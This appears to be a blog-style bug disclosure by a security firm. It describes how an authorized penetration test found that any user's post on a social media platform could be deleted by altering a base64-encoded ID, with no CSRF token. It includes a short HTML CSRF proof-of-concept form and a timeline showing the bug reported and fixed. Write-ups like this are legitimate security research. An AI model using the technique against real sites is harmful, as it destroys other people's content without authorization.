How I was able to delete anyone’s post

Rapid SafeGuard
Nov 5 · 2 min read

Hello Guys,
This is Rapid Safeguard. Rapid Safeguard is a foolproof Security Solution for the emerging businesses and startups of India. We are focusing upon 4 major verticals including Web Security, Network Security, IoT Security and Mobile Security. We have developed Web Application Vulnerability Scanning Software.

Last month I was doing penetration testing for private company with our proprietary software. Company has Social media platform. Our software discovered Information disclosure vulnerability.

Server disclosure
Information disclosure
PHPINFO

As our company rule, We are more focused on manual testing. Therefore, I dig into application, Some parameters manipulation with CSRF attack resulted into delete anyone post. Let’s see how it is possible — — .

I was going through delete a post function and to find vulnerability. It is look simple function of delete a post with Javascript confirm box. ID is encoded with base64. I have tried to manipulate the delete parameter with someone’s post.

Delete post

I changed the delete parameter value “Base64encode = value” such as “MzUx = 351”. I got “200 OK” response. Now, I am able to delete all the post without any admin or user permission.

CSRF proof of concept

<html>
<body>
<script>history.pushState(‘’, ‘’, ‘/’)</script>
<form action=”https://Target//post_data.php">
<input type=”hidden” name=”del” value=” ” />
<input type=”submit” value=”Submit request” />
</form>
</body>
</html>

Surprise!! there is no CSRF token. Put del value with base64 encode.
Post inspired by blog Avinash Jain (@logicbomb_1)

Rapid Safeguard

Report details

26 — Sep— 2019 Bug reported to the concerned company

20 — Oct — 2019 Bug fixed

Welcome to a place where words matter. On Medium, smart voices and original ideas take center stage - with no ads in sight. Watch
Follow all the topics you care about, and we’ll deliver the best stories for you to your homepage and inbox. Explore
Get unlimited access to the best stories on Medium — and support writers while you’re at it. Just $5/month. Upgrade